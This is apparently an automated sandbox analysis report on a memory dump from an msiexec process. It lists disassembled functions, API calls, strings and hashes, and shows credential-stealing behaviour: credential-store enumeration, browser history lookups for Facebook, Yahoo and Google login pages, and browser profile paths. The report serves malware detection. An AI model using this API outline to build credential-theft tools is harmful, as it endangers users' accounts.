                                                                                                        • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                        • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                        • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                        Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 586 4093b1 574->586 587 4094ff-40950b call 443d90 574->587 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 586->589 587->568 597 40950d-409511 587->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->587 611->580 612 40929f-4092a3 611->612 612->580 614 4092a9-4092ba 612->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004091E2
                                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                        • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                        • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                        • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                        • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                        • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3715365532-3916222277
                                                                                                        • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                        • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                        • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                        • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                        Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                          • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                          • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                          • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                          • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                          • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                        • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                        • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                        • String ID: bhv
                                                                                                        • API String ID: 4234240956-2689659898
                                                                                                        • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                        • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                        • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                        • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                        Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                        • API String ID: 2941347001-70141382
                                                                                                        • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                        • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                        • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                        • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                        Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 713 44673d-446745 708->713 710 446755-446758 709->710 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2827331108-0
                                                                                                        • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                        • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                        • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                        • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                        Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040C298
                                                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                        • wcschr.MSVCRT ref: 0040C324
                                                                                                        • wcschr.MSVCRT ref: 0040C344
                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                        • GetLastError.KERNEL32 ref: 0040C373
                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                        • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                        • String ID: visited:
                                                                                                        • API String ID: 1157525455-1702587658
                                                                                                        • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                        • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                        • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                        • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                        Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 781->783 784 40e288-40e290 free 781->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                        • memset.MSVCRT ref: 0040E1BD
                                                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                        • free.MSVCRT ref: 0040E28B
                                                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                          • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                          • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                        • _snwprintf.MSVCRT ref: 0040E257
                                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                        • API String ID: 2804212203-2982631422
                                                                                                        • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                        • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                        • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                        • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                        Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                        • memset.MSVCRT ref: 0040BC75
                                                                                                        • memset.MSVCRT ref: 0040BC8C
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                        • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                        • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 115830560-3916222277
                                                                                                        • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                        • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                        • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                        • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                        Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                          • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                          • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                          • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                          • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                          • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                        • _wcslwr.MSVCRT ref: 0040C817
                                                                                                          • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                          • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                        • wcslen.MSVCRT ref: 0040C82C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                        • API String ID: 2936932814-4196376884
                                                                                                        • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                        • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                        • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                        • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                        Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 914 40bf38-40bf48 LocalFree 911->914 915 40bf2f-40bf35 911->915 912->911 917 40bf08-40bf0e 912->917 914->903 915->914 917->911
                                                                                                        APIs
                                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                        • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                        • wcslen.MSVCRT ref: 0040BE06
                                                                                                        • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                        • memset.MSVCRT ref: 0040BE91
                                                                                                        • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                        • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                        • wcschr.MSVCRT ref: 0040BF24
                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 697348961-0
                                                                                                        • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                        • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                        • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                        • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                        Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403CBF
                                                                                                        • memset.MSVCRT ref: 00403CD4
                                                                                                        • memset.MSVCRT ref: 00403CE9
                                                                                                        • memset.MSVCRT ref: 00403CFE
                                                                                                        • memset.MSVCRT ref: 00403D13
                                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                        • memset.MSVCRT ref: 00403DDA
                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                        • String ID: Waterfox$Waterfox\Profiles
                                                                                                        • API String ID: 1829478387-11920434
                                                                                                        • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                        • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                        • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
